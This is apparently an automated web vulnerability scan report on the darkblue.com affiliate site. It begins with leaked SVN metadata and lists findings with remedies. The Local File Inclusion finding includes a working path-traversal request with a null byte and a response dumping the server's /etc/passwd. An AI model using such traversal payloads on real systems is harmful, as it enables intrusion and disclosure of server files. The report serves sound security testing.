78/dbs/!svn/ver/38013/darkblue/branches/live/www/advtermsandconditions_adult.htmENDsubcontroller.phpK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/subcontroller.phpENDcaption.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/caption.htmENDstatisticsad.htmK 25svn:wc:ra_dav:version-urlV 63/dbs/!svn/ver/38013/darkblue/branches/live/www/statisticsad.htmENDmainaff.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/mainaff.htmENDt.phpK 25svn:wc:ra_dav:version-urlV 52/dbs/!svn/ver/38013/darkblue/branches/live/www/t.phpENDdate_signup.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/date_signup.htmENDsortdesc.gifK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/sortdesc.gifENDgethtml.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/gethtml.phpENDroarcamp.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/roarcamp.htmENDxbDebug.jsK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/xbDebug.jsENDdentalplans.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/dentalplans.htmENDindex.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38669/darkblue/branches/live/www/index.htmENDadvertiser.cssK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/advertiser.cssENDapi.phpK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/api.phpENDadminTools.htmK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/adminTools.htmENDariblk.ttfK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/ariblk.ttfENDsortasc.pngK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/sortasc.pngENDstat.htmK 25svn:wc:ra_dav:version-urlV 
55/dbs/!svn/ver/40063/darkblue/branches/live/www/stat.htmENDsexualhealth_signup.htmK 25svn:wc:ra_dav:version-urlV 70/dbs/!svn/ver/38013/darkblue/branches/live/www/sexualhealth_signup.htmENDinsurance_signup.htmK 25svn:wc:ra_dav:version-urlV 67/dbs/!svn/ver/38013/darkblue/branches/live/www/insurance_signup.htmENDftc_____.ttfK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/ftc_____.ttfENDadvfrontpage.phpK 25svn:wc:ra_dav:version-urlV 63/dbs/!svn/ver/38013/darkblue/branches/live/www/advfrontpage.phpENDbillingReturn.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/billingReturn.htmENDnutrition_signup.htmK 25svn:wc:ra_dav:version-urlV 67/dbs/!svn/ver/38013/darkblue/branches/live/www/nutrition_signup.htmENDmaintenance.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/maintenance.htmENDAIM.gifK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/AIM.gifENDmessage.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/message.htmENDinvoiceapi.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/invoiceapi.phpENDgetPaypal.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/getPaypal.htmEND4ArmJoltScript.ttfK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/4ArmJoltScript.ttfENDscripts.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/scripts.htmENDblank.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/blank.htmENDfrontpage_subpage.phpK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/frontpage_subpage.phpENDheapPing.phpK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/heapPing.phpENDsortasc.gifK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/sortasc.gifENDYahoo.gifK 
25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/Yahoo.gifENDgroupTest.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/groupTest.htmENDgraphit.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/graphit.phpENDtechnology_signup.htmK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/technology_signup.htmENDse-guru_net-header.gifK 25svn:wc:ra_dav:version-urlV 69/dbs/!svn/ver/38013/darkblue/branches/live/www/se-guru_net-header.gifENDcustomercaread.htmK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/customercaread.htmENDadvtermsandconditions.htmK 25svn:wc:ra_dav:version-urlV 72/dbs/!svn/ver/38013/darkblue/branches/live/www/advtermsandconditions.htmENDdebt_signup.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/debt_signup.htmENDupdateLinkStatus.phpK 25svn:wc:ra_dav:version-urlV 67/dbs/!svn/ver/38013/darkblue/branches/live/www/updateLinkStatus.phpENDfavicon.icoK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/favicon.icoENDx10camp.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/x10camp.htmENDhairloss_signup.htmK 25svn:wc:ra_dav:version-urlV 66/dbs/!svn/ver/38013/darkblue/branches/live/www/hairloss_signup.htmENDgetcode.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/getcode.phpENDadWarn.htmK 25svn:wc:ra_dav:version-urlV 57/dbs/!svn/ver/38013/darkblue/branches/live/www/adWarn.htmENDweightloss_signup.htmK 25svn:wc:ra_dav:version-urlV 68/dbs/!svn/ver/38013/darkblue/branches/live/www/weightloss_signup.htmENDcheck.htmK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/check.htmENDsid.htmK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/sid.htmENDdescribe.htmK 25svn:wc:ra_dav:version-urlV 
59/dbs/!svn/ver/38013/darkblue/branches/live/www/describe.htmENDconsoleViewer.phpK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/consoleViewer.phpENDfrontpage.phpK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/frontpage.phpENDunsubscribe.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/unsubscribe.htmENDdetails.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/details.htmENDedit.htmK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/edit.htmENDpayoutDetails.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/payoutDetails.htmENDfeedSearch.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/feedSearch.phpENDpharmacy_signup.htmK 25svn:wc:ra_dav:version-urlV 66/dbs/!svn/ver/38013/darkblue/branches/live/www/pharmacy_signup.htmENDmlgraph.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/mlgraph.phpENDcodeCreator.htmK 25svn:wc:ra_dav:version-urlV 62/dbs/!svn/ver/38013/darkblue/branches/live/www/codeCreator.htmENDcontroller_new.phpK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/controller_new.phpENDbanlist.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/banlist.htmENDaff.htmK 25svn:wc:ra_dav:version-urlV 54/dbs/!svn/ver/38013/darkblue/branches/live/www/aff.htmENDsizes.phpK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/sizes.phpENDarial.ttfK 25svn:wc:ra_dav:version-urlV 56/dbs/!svn/ver/38013/darkblue/branches/live/www/arial.ttfENDgaTerms.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/gaTerms.phpENDcasino_signup.htmK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/casino_signup.htmENDgaTerms.htmK 25svn:wc:ra_dav:version-urlV 
58/dbs/!svn/ver/38013/darkblue/branches/live/www/gaTerms.htmENDpayoutHistory.phpK 25svn:wc:ra_dav:version-urlV 64/dbs/!svn/ver/38013/darkblue/branches/live/www/payoutHistory.phpENDshowCreative.htmK 25svn:wc:ra_dav:version-urlV 63/dbs/!svn/ver/38013/darkblue/branches/live/www/showCreative.htmENDcontactus.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/contactus.htmENDNoABNStatement.pdfK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/NoABNStatement.pdfENDaffiliates.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/affiliates.phpENDmovesortx.curK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/movesortx.curENDbanAdmin.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/banAdmin.htmENDtermsandconditions_adlt.htmK 25svn:wc:ra_dav:version-urlV 74/dbs/!svn/ver/38013/darkblue/branches/live/www/termsandconditions_adlt.htmENDbees.htmK 25svn:wc:ra_dav:version-urlV 55/dbs/!svn/ver/38013/darkblue/branches/live/www/bees.htmENDmainadv.htmK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/mainadv.htmENDsignup_step01_bt_LANDINGPAGE.htmK 25svn:wc:ra_dav:version-urlV 79/dbs/!svn/ver/38013/darkblue/branches/live/www/signup_step01_bt_LANDINGPAGE.htmENDstatsGraph.phpK 25svn:wc:ra_dav:version-urlV 61/dbs/!svn/ver/38013/darkblue/branches/live/www/statsGraph.phpENDassetShow.htmK 25svn:wc:ra_dav:version-urlV 60/dbs/!svn/ver/38013/darkblue/branches/live/www/assetShow.htmENDcontroller_old.phpK 25svn:wc:ra_dav:version-urlV 65/dbs/!svn/ver/38013/darkblue/branches/live/www/controller_old.phpENDcasinoonnetcamp.htmK 25svn:wc:ra_dav:version-urlV 66/dbs/!svn/ver/38013/darkblue/branches/live/www/casinoonnetcamp.htmENDwhoweare.htmK 25svn:wc:ra_dav:version-urlV 59/dbs/!svn/ver/38013/darkblue/branches/live/www/whoweare.htmENDcontroller.phpK 25svn:wc:ra_dav:version-urlV 
61/dbs/!svn/ver/38013/darkblue/branches/live/www/controller.phpENDsubPage.phpK 25svn:wc:ra_dav:version-urlV 58/dbs/!svn/ver/38013/darkblue/branches/live/www/subPage.phpEND
[High Possibility] Local File Inclusion

1 TOTAL
IMPORTANT
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into the attacked server page. Even though Netsparker believes that there is a Local File Inclusion here, it could not confirm it.

Impact

Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
  • Gather usernames via the /etc/passwd file
  • Harvest useful information from log files such as /apache/logs/error.log or /apache/logs/access.log
  • Remotely execute commands by combining this vulnerability with other attack vectors such as a file upload vulnerability or log injection.

Remedy

  • If possible, do not accept file paths appended directly from user input. Hard-code the path, or make it selectable from a limited hard-coded list of paths via an index variable.
  • If you definitely need dynamic path concatenation, ensure that you only accept the required characters, such as "a-zA-Z0-9", and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
  • Finally, it is important to limit the API to allow inclusion only from one directory and the directories below it. This way you can ensure that a potential attacker cannot perform a directory traversal attack.
- /index.htm

/index.htm

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%..

Parameters

Parameter Type Value
info GET 1
section GET ../../../../../CANTBEHERE/../../../../../../etc/passwd index.htm
email POST netsparker@example.com
sent POST true
submit POST 3

Request

POST /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00index.htm HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 49
Accept-Encoding: gzip, deflate

email=netsparker%40example.com&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS 
User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
Critical Form Served Over HTTP

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker identified that a password field is served over HTTP.

Impact

If an attacker can carry out a MITM (Man in the middle) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or by changing the form's action in the HTML to steal the user's password. Even though the form's target page is HTTPS, this does not protect the system against MITM attacks, because the page that serves the form can itself be tampered with in transit.

This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take

  1. See the remedy for the solution.
  2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /

/ CONFIRMED

http://darkblue.com/

Form target action

https://www.darkblue.com/index.htm

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" 
rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" 
class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /

/ CONFIRMED

http://darkblue.com/

Identified Field Name

loginid

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 5723
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <meta http-equiv="Content-type" content="text/html;charset=UTF-8" /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"/> <script type="text/javascript" src="/skins/lander/js/jquery-1.4.min.js"></script> <script type="text/javascript" src="/skins/lander/js/jquery.validate.pack.js"></script> <script type="text/javascript"> $(function(){ $("#contactForm").validate(); $("#affiliateForm").validate(); $("#advertiserForm").validate(); }); </script></head><body> <div id="container"> <img src="skins/lander/images/darkblue.png" alt="DarkBlue.com" title="DarkBlue Affiliate Network" /> <!-- CONTACT FORM /--> <div id="contact-container"> <h1>Contact Us</h1> <form id="contactForm" method="post" action="https://www.darkblue.com/index.htm" name="contactform"> <table> <tr><td><label for="name">Your Name</label></td> <td><div class="error-wrap"><input id="name" name="name" class="required" type="text" value=""/></div></td></tr> <tr><td><label for="email">Your Email</label></td> <td><div class="error-wrap"><input id="email" name="email" class="required email" type="text" value=""/></div></td></tr> <tr><td class="align-top"><label for="query">Your Query</label></td> <td><div class="error-wrap"><textarea id="query" name="query" class="required" cols="25" 
rows="5"></textarea></div></td></tr> <tr><td></td><td class="button-td"><input id="send" type="submit" name="submit" value=""></td></tr> </table> </form> <img id="vertical-divider" src="skins/lander/images/divider-v.png" alt="content divider" /> </div> <div id="logins-container"> <!-- AFFILIATE LOGIN /--> <div id="affiliate-login-container"> <h2>Affiliates</h2><h3> - Log into your affiliate account</h3> <form name="" id="affiliateForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="pub"> <table> <tr><td><label for="affiliate-username">Username</label></td> <td><div class="error-wrap"><input id="affiliate-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="affiliate-password">Password</label></td> <td><div class="error-wrap"><input id="affiliate-password" type="password" name="loginpass" class="required" /></div></td></tr> </table> <span> <input id="affiliate-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> <img id="horizontal-divider" src="skins/lander/images/divider-h.png" alt="content divider" /> <!-- ADVERTISER LOGIN /--> <div id="advertiser-login-container"> <h2>Advertisers</h2><h3> - Log into your advertiser account</h3> <form name="" id="advertiserForm" action="https://www.darkblue.com/index.htm" method="POST"> <input type="hidden" name="logintype" value="adv"> <table> <tr><td><label for="advertiser-username">Username</label></td> <td><div class="error-wrap"><input id="advertiser-username" name="loginid" class="required" /></div></td></tr> <tr><td><label for="advertiser-password">Password</label></td> <td><div class="error-wrap"><input id="advertiser-password" type="password" name="loginpass" 
class="required" /></div></td></tr> </table> <span> <input id="advertiser-login-btn" class="login-button" type="submit" name="submit" value="" /> <a href="/index.htm?info=1&section=forgotpassword" onclick="window.open('/index.htm?info=1&section=forgotpassword', 'darkblue_reset', 'location=0,status=0,scrollbars=1,width=600,height=200'); return false;">Forgotten your Password?</a> </span> </form> </div> </div> <p>&#169 2010 DarkBlue.com | <a href="#" onclick="window.open('/index.htm?info=1&section=aff_tc', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Terms &#38 Conditions</a> | <a href="#" onclick="window.open('/index.htm?info=1&section=privacypolicy', 'darkblue_info', 'location=0,status=0,scrollbars=1,width=800,height=600');">Privacy Policy</a></p> </div> </body></html>
Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after these changes, JavaScript code will not be able to read the cookies).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However, this is not a silver bullet and will not by itself protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /.svn/text-base/affiliates.php.svn-base

/.svn/text-base/affiliates.php.svn-base CONFIRMED

http://darkblue.com/.svn/text-base/affiliates.php.svn-base

Identified Cookie

logintype

Request

GET /.svn/text-base/affiliates.php.svn-base HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:23:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: logintype=deleted; expires=Mon, 04-Jan-2010 17:23:57 GMT; path=/,loginid=deleted; expires=Mon, 04-Jan-2010 17:23:57 GMT; path=/,loginpass=deleted; expires=Mon, 04-Jan-2010 17:23:57 GMT; path=/
Content-Length: 0
Content-Type: text/css


Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://darkblue.com/

Extracted Version

Apache/2.2.3 (CentOS)

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
